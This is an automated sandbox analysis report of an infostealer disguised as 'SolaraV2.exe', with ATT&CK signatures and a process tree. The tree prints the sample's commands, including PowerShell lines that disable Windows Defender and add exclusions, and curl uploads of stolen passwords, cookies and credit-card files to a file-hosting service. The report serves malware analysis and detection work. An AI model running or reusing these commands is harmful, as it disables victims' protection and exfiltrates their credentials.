988023b9ee83128ca6b4d5417992e1f4325759040bf98947726351b5a82fcf3a

Analysis

max time kernel
92s
max time network
133s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
14-11-2024 16:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SolaraV2.exe
Size

17.7MB
MD5

260b6ec6ffbc775e27d9dc168f2c904e
SHA1

21d618b1704ec72e7c59a7796176aa6db1f6ca18
SHA256

988023b9ee83128ca6b4d5417992e1f4325759040bf98947726351b5a82fcf3a
SHA512

b4359aaf7dd30b9855cc20f647d00a7f3a2f74106af1defc916221c2947d05c3ce0a023f6f3c8b8dea668c0d6936212bc1b0989d63aa1233f7b1b93fbb7351bf
SSDEEP

393216:w+cKNkHwDKDHkO+2M8gCLrUgJZFwIHziK1piXLGVE4Ue0VJ5:HNkAKDEb2HJIgVDiXHi0L5

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation pyinstaller spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
684	powershell.exe
2500	powershell.exe
3560	powershell.exe
1224	powershell.exe
1988	powershell.exe
2188	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

attrib.exeattrib.exeSolaraV2.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	SolaraV2.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

Processes:

cmd.exepowershell.exe

pid	Process
3244	cmd.exe
1628	powershell.exe

Drops startup file 1 IoCs

Processes:

bound.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bound.exe	bound.exe

Executes dropped EXE 3 IoCs

Processes:

bound.exebound.exerar.exe

pid	Process
3152	bound.exe
4768	bound.exe
3368	rar.exe

Loads dropped DLL 55 IoCs

Processes:

SolaraV2.exebound.exe

pid	Process
4396	SolaraV2.exe
4396	SolaraV2.exe
4396	SolaraV2.exe
4396	SolaraV2.exe
4396	SolaraV2.exe
4396	SolaraV2.exe
4396	SolaraV2.exe
4396	SolaraV2.exe
4396	SolaraV2.exe
4396	SolaraV2.exe
4396	SolaraV2.exe
4396	SolaraV2.exe
4396	SolaraV2.exe
4396	SolaraV2.exe
4396	SolaraV2.exe
4396	SolaraV2.exe
4396	SolaraV2.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe
4768	bound.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 26 IoCs

Web Service

T1102

Processes:

flow	ioc
51	discord.com
53	discord.com
12	discord.com
23	discord.com
34	discord.com
37	discord.com
40	discord.com
47	discord.com
54	discord.com
24	discord.com
28	discord.com
55	discord.com
48	discord.com
49	discord.com
18	discord.com
20	discord.com
29	discord.com
35	discord.com
36	discord.com
42	discord.com
19	discord.com
25	discord.com
38	discord.com
39	discord.com
41	discord.com
50	discord.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
1	ip-api.com
7	api.ipify.org
9	api.ipify.org
12	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	Process
3820	tasklist.exe
1184	tasklist.exe
3228	tasklist.exe
4568	tasklist.exe
2816	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

Processes:

cmd.exe

pid	Process
4048	cmd.exe

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/files/0x001900000002aae2-22.dat	upx
behavioral1/memory/4396-26-0x00007FF9473A0000-0x00007FF947A03000-memory.dmp	upx
behavioral1/files/0x001900000002aacc-28.dat	upx
behavioral1/files/0x001c00000002aad7-49.dat	upx
behavioral1/memory/4396-50-0x00007FF951330000-0x00007FF95133F000-memory.dmp	upx
behavioral1/files/0x001900000002aad6-48.dat	upx
behavioral1/files/0x001900000002aad3-47.dat	upx
behavioral1/files/0x001900000002aad2-46.dat	upx
behavioral1/files/0x001c00000002aad1-45.dat	upx
behavioral1/files/0x001900000002aad0-44.dat	upx
behavioral1/files/0x001900000002aacd-43.dat	upx
behavioral1/files/0x001b00000002aac7-42.dat	upx
behavioral1/files/0x001c00000002aae9-41.dat	upx
behavioral1/files/0x001900000002aae8-40.dat	upx
behavioral1/files/0x001900000002aae5-39.dat	upx
behavioral1/files/0x001900000002aadf-36.dat	upx
behavioral1/files/0x001c00000002aadd-35.dat	upx
behavioral1/files/0x001900000002aade-32.dat	upx
behavioral1/memory/4396-31-0x00007FF951290000-0x00007FF9512B7000-memory.dmp	upx
behavioral1/memory/4396-56-0x00007FF94AC20000-0x00007FF94AC4B000-memory.dmp	upx
behavioral1/memory/4396-58-0x00007FF94D150000-0x00007FF94D169000-memory.dmp	upx
behavioral1/memory/4396-60-0x00007FF94ABF0000-0x00007FF94AC15000-memory.dmp	upx
behavioral1/memory/4396-62-0x00007FF947AC0000-0x00007FF947C3F000-memory.dmp	upx
behavioral1/memory/4396-66-0x00007FF9512F0000-0x00007FF9512FD000-memory.dmp	upx
behavioral1/memory/4396-65-0x00007FF94CDA0000-0x00007FF94CDB9000-memory.dmp	upx
behavioral1/memory/4396-68-0x00007FF94ABB0000-0x00007FF94ABE4000-memory.dmp	upx
behavioral1/memory/4396-73-0x00007FF9472D0000-0x00007FF94739E000-memory.dmp	upx
behavioral1/memory/4396-74-0x00007FF944C30000-0x00007FF945163000-memory.dmp	upx
behavioral1/memory/4396-76-0x00007FF951290000-0x00007FF9512B7000-memory.dmp	upx
behavioral1/memory/4396-80-0x00007FF94AA70000-0x00007FF94AA7D000-memory.dmp	upx
behavioral1/memory/4396-79-0x00007FF94BC80000-0x00007FF94BC94000-memory.dmp	upx
behavioral1/memory/4396-72-0x00007FF9473A0000-0x00007FF947A03000-memory.dmp	upx
behavioral1/memory/4396-86-0x00007FF94ABF0000-0x00007FF94AC15000-memory.dmp	upx
behavioral1/memory/4396-88-0x00007FF946F10000-0x00007FF946FC3000-memory.dmp	upx
behavioral1/memory/4396-87-0x00007FF947AC0000-0x00007FF947C3F000-memory.dmp	upx
behavioral1/memory/4396-303-0x00007FF94ABB0000-0x00007FF94ABE4000-memory.dmp	upx
behavioral1/memory/4396-384-0x00007FF9472D0000-0x00007FF94739E000-memory.dmp	upx
behavioral1/memory/4396-385-0x00007FF944C30000-0x00007FF945163000-memory.dmp	upx
behavioral1/memory/4396-431-0x00007FF947AC0000-0x00007FF947C3F000-memory.dmp	upx
behavioral1/memory/4396-425-0x00007FF9473A0000-0x00007FF947A03000-memory.dmp	upx
behavioral1/memory/4396-461-0x00007FF9473A0000-0x00007FF947A03000-memory.dmp	upx
behavioral1/memory/4396-476-0x00007FF9473A0000-0x00007FF947A03000-memory.dmp	upx
behavioral1/memory/4396-491-0x00007FF951290000-0x00007FF9512B7000-memory.dmp	upx
behavioral1/memory/4396-488-0x00007FF94BC80000-0x00007FF94BC94000-memory.dmp	upx
behavioral1/memory/4396-501-0x00007FF944C30000-0x00007FF945163000-memory.dmp	upx
behavioral1/memory/4396-500-0x00007FF9472D0000-0x00007FF94739E000-memory.dmp	upx
behavioral1/memory/4396-499-0x00007FF94ABB0000-0x00007FF94ABE4000-memory.dmp	upx
behavioral1/memory/4396-498-0x00007FF947AC0000-0x00007FF947C3F000-memory.dmp	upx
behavioral1/memory/4396-497-0x00007FF94CDA0000-0x00007FF94CDB9000-memory.dmp	upx
behavioral1/memory/4396-496-0x00007FF9512F0000-0x00007FF9512FD000-memory.dmp	upx
behavioral1/memory/4396-495-0x00007FF94ABF0000-0x00007FF94AC15000-memory.dmp	upx
behavioral1/memory/4396-494-0x00007FF94D150000-0x00007FF94D169000-memory.dmp	upx
behavioral1/memory/4396-493-0x00007FF94AC20000-0x00007FF94AC4B000-memory.dmp	upx
behavioral1/memory/4396-492-0x00007FF951330000-0x00007FF95133F000-memory.dmp	upx
behavioral1/memory/4396-490-0x00007FF946F10000-0x00007FF946FC3000-memory.dmp	upx
behavioral1/memory/4396-489-0x00007FF94AA70000-0x00007FF94AA7D000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
behavioral1/files/0x001f00000002aabc-108.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

cmd.exePING.EXE

pid	Process
5328	cmd.exe
5496	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

Processes:

cmd.exenetsh.exe

pid	Process
4512	cmd.exe
5072	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

WMIC.exeWMIC.exeWMIC.exe

pid	Process
1772	WMIC.exe
1464	WMIC.exe
4944	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

Processes:

systeminfo.exe

pid	Process
2256	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
5496	PING.EXE

Suspicious behavior: EnumeratesProcesses 26 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
684	powershell.exe
2188	powershell.exe
684	powershell.exe
2500	powershell.exe
2500	powershell.exe
2188	powershell.exe
2188	powershell.exe
2500	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
1628	powershell.exe
1628	powershell.exe
4204	powershell.exe
4204	powershell.exe
4204	powershell.exe
1628	powershell.exe
1224	powershell.exe
1224	powershell.exe
1224	powershell.exe
3596	powershell.exe
3596	powershell.exe
1988	powershell.exe
1988	powershell.exe
4516	powershell.exe
4516	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exeWMIC.exetasklist.exepowershell.exeWMIC.exe

description	pid	Process
Token: SeDebugPrivilege	684	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeIncreaseQuotaPrivilege	3900	WMIC.exe
Token: SeSecurityPrivilege	3900	WMIC.exe
Token: SeTakeOwnershipPrivilege	3900	WMIC.exe
Token: SeLoadDriverPrivilege	3900	WMIC.exe
Token: SeSystemProfilePrivilege	3900	WMIC.exe
Token: SeSystemtimePrivilege	3900	WMIC.exe
Token: SeProfSingleProcessPrivilege	3900	WMIC.exe
Token: SeIncBasePriorityPrivilege	3900	WMIC.exe
Token: SeCreatePagefilePrivilege	3900	WMIC.exe
Token: SeBackupPrivilege	3900	WMIC.exe
Token: SeRestorePrivilege	3900	WMIC.exe
Token: SeShutdownPrivilege	3900	WMIC.exe
Token: SeDebugPrivilege	3900	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3900	WMIC.exe
Token: SeRemoteShutdownPrivilege	3900	WMIC.exe
Token: SeUndockPrivilege	3900	WMIC.exe
Token: SeManageVolumePrivilege	3900	WMIC.exe
Token: 33	3900	WMIC.exe
Token: 34	3900	WMIC.exe
Token: 35	3900	WMIC.exe
Token: 36	3900	WMIC.exe
Token: SeDebugPrivilege	3820	tasklist.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeIncreaseQuotaPrivilege	3900	WMIC.exe
Token: SeSecurityPrivilege	3900	WMIC.exe
Token: SeTakeOwnershipPrivilege	3900	WMIC.exe
Token: SeLoadDriverPrivilege	3900	WMIC.exe
Token: SeSystemProfilePrivilege	3900	WMIC.exe
Token: SeSystemtimePrivilege	3900	WMIC.exe
Token: SeProfSingleProcessPrivilege	3900	WMIC.exe
Token: SeIncBasePriorityPrivilege	3900	WMIC.exe
Token: SeCreatePagefilePrivilege	3900	WMIC.exe
Token: SeBackupPrivilege	3900	WMIC.exe
Token: SeRestorePrivilege	3900	WMIC.exe
Token: SeShutdownPrivilege	3900	WMIC.exe
Token: SeDebugPrivilege	3900	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3900	WMIC.exe
Token: SeRemoteShutdownPrivilege	3900	WMIC.exe
Token: SeUndockPrivilege	3900	WMIC.exe
Token: SeManageVolumePrivilege	3900	WMIC.exe
Token: 33	3900	WMIC.exe
Token: 34	3900	WMIC.exe
Token: 35	3900	WMIC.exe
Token: 36	3900	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1772	WMIC.exe
Token: SeSecurityPrivilege	1772	WMIC.exe
Token: SeTakeOwnershipPrivilege	1772	WMIC.exe
Token: SeLoadDriverPrivilege	1772	WMIC.exe
Token: SeSystemProfilePrivilege	1772	WMIC.exe
Token: SeSystemtimePrivilege	1772	WMIC.exe
Token: SeProfSingleProcessPrivilege	1772	WMIC.exe
Token: SeIncBasePriorityPrivilege	1772	WMIC.exe
Token: SeCreatePagefilePrivilege	1772	WMIC.exe
Token: SeBackupPrivilege	1772	WMIC.exe
Token: SeRestorePrivilege	1772	WMIC.exe
Token: SeShutdownPrivilege	1772	WMIC.exe
Token: SeDebugPrivilege	1772	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1772	WMIC.exe
Token: SeRemoteShutdownPrivilege	1772	WMIC.exe
Token: SeUndockPrivilege	1772	WMIC.exe
Token: SeManageVolumePrivilege	1772	WMIC.exe
Token: 33	1772	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

SolaraV2.exeSolaraV2.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exebound.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 2168 wrote to memory of 4396	2168	SolaraV2.exe	77
PID 2168 wrote to memory of 4396	2168	SolaraV2.exe	77
PID 4396 wrote to memory of 1228	4396	SolaraV2.exe	78
PID 4396 wrote to memory of 1228	4396	SolaraV2.exe	78
PID 4396 wrote to memory of 8	4396	SolaraV2.exe	79
PID 4396 wrote to memory of 8	4396	SolaraV2.exe	79
PID 1228 wrote to memory of 684	1228	cmd.exe	82
PID 1228 wrote to memory of 684	1228	cmd.exe	82
PID 8 wrote to memory of 2188	8	cmd.exe	83
PID 8 wrote to memory of 2188	8	cmd.exe	83
PID 4396 wrote to memory of 3464	4396	SolaraV2.exe	84
PID 4396 wrote to memory of 3464	4396	SolaraV2.exe	84
PID 4396 wrote to memory of 1088	4396	SolaraV2.exe	171
PID 4396 wrote to memory of 1088	4396	SolaraV2.exe	171
PID 4396 wrote to memory of 968	4396	SolaraV2.exe	86
PID 4396 wrote to memory of 968	4396	SolaraV2.exe	86
PID 4396 wrote to memory of 2180	4396	SolaraV2.exe	90
PID 4396 wrote to memory of 2180	4396	SolaraV2.exe	90
PID 4396 wrote to memory of 1036	4396	SolaraV2.exe	92
PID 4396 wrote to memory of 1036	4396	SolaraV2.exe	92
PID 2180 wrote to memory of 3820	2180	cmd.exe	94
PID 2180 wrote to memory of 3820	2180	cmd.exe	94
PID 1036 wrote to memory of 3900	1036	cmd.exe	95
PID 1036 wrote to memory of 3900	1036	cmd.exe	95
PID 3464 wrote to memory of 2500	3464	cmd.exe	96
PID 3464 wrote to memory of 2500	3464	cmd.exe	96
PID 968 wrote to memory of 4756	968	cmd.exe	97
PID 968 wrote to memory of 4756	968	cmd.exe	97
PID 1088 wrote to memory of 3152	1088	cmd.exe	98
PID 1088 wrote to memory of 3152	1088	cmd.exe	98
PID 3152 wrote to memory of 4768	3152	bound.exe	100
PID 3152 wrote to memory of 4768	3152	bound.exe	100
PID 4396 wrote to memory of 3808	4396	SolaraV2.exe	101
PID 4396 wrote to memory of 3808	4396	SolaraV2.exe	101
PID 3808 wrote to memory of 3816	3808	cmd.exe	103
PID 3808 wrote to memory of 3816	3808	cmd.exe	103
PID 4396 wrote to memory of 4064	4396	SolaraV2.exe	104
PID 4396 wrote to memory of 4064	4396	SolaraV2.exe	104
PID 4064 wrote to memory of 2632	4064	cmd.exe	106
PID 4064 wrote to memory of 2632	4064	cmd.exe	106
PID 4396 wrote to memory of 1724	4396	SolaraV2.exe	107
PID 4396 wrote to memory of 1724	4396	SolaraV2.exe	107
PID 1724 wrote to memory of 1772	1724	cmd.exe	109
PID 1724 wrote to memory of 1772	1724	cmd.exe	109
PID 4396 wrote to memory of 3048	4396	SolaraV2.exe	110
PID 4396 wrote to memory of 3048	4396	SolaraV2.exe	110
PID 3048 wrote to memory of 1464	3048	cmd.exe	112
PID 3048 wrote to memory of 1464	3048	cmd.exe	112
PID 4396 wrote to memory of 4048	4396	SolaraV2.exe	113
PID 4396 wrote to memory of 4048	4396	SolaraV2.exe	113
PID 4396 wrote to memory of 2920	4396	SolaraV2.exe	115
PID 4396 wrote to memory of 2920	4396	SolaraV2.exe	115
PID 4048 wrote to memory of 2428	4048	cmd.exe	117
PID 4048 wrote to memory of 2428	4048	cmd.exe	117
PID 2920 wrote to memory of 3560	2920	cmd.exe	118
PID 2920 wrote to memory of 3560	2920	cmd.exe	118
PID 4396 wrote to memory of 2196	4396	SolaraV2.exe	119
PID 4396 wrote to memory of 2196	4396	SolaraV2.exe	119
PID 4396 wrote to memory of 32	4396	SolaraV2.exe	120
PID 4396 wrote to memory of 32	4396	SolaraV2.exe	120
PID 32 wrote to memory of 1184	32	cmd.exe	123
PID 32 wrote to memory of 1184	32	cmd.exe	123
PID 2196 wrote to memory of 3228	2196	cmd.exe	124
PID 2196 wrote to memory of 3228	2196	cmd.exe	124

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid	Process
2428	attrib.exe
3276	attrib.exe
3952	attrib.exe

C:\Users\Admin\AppData\Local\Temp\SolaraV2.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraV2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Users\Admin\AppData\Local\Temp\SolaraV2.exe
  "C:\Users\Admin\AppData\Local\Temp\SolaraV2.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SolaraV2.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1228
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SolaraV2.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:8
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3464
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1088
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3152
    - - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        5⤵
        Drops startup file
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4768
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt""
        6⤵
        
        PID:4900
        
        C:\Windows\system32\curl.exe
        
        curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt"
        7⤵
        
        PID:3192
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt""
        6⤵
        
        PID:3424
        
        C:\Windows\system32\curl.exe
        
        curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt"
        7⤵
        
        PID:1820
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt""
        6⤵
        
        PID:784
        
        C:\Windows\system32\curl.exe
        
        curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt"
        7⤵
        
        PID:2420
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt""
        6⤵
        
        PID:2940
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1628
        
        C:\Windows\system32\curl.exe
        
        curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt"
        7⤵
        
        PID:5004
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt""
        6⤵
        
        PID:5060
        
        C:\Windows\system32\curl.exe
        
        curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt"
        7⤵
        
        PID:4204
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt""
        6⤵
        
        PID:5000
        
        C:\Windows\system32\curl.exe
        
        curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt"
        7⤵
        
        PID:1452
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin/Downloads/BackupRestore.jtx""
        6⤵
        
        PID:5168
        
        C:\Windows\system32\curl.exe
        
        curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin/Downloads/BackupRestore.jtx"
        7⤵
        
        PID:5228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara V2 need update !', 0, 'SolaraV2 crashed', 16+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:968
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara V2 need update !', 0, 'SolaraV2 crashed', 16+16);close()"
      4⤵
      PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2180
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3808
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4064
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1724
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3048
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\SolaraV2.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4048
  - - C:\Windows\system32\attrib.exe
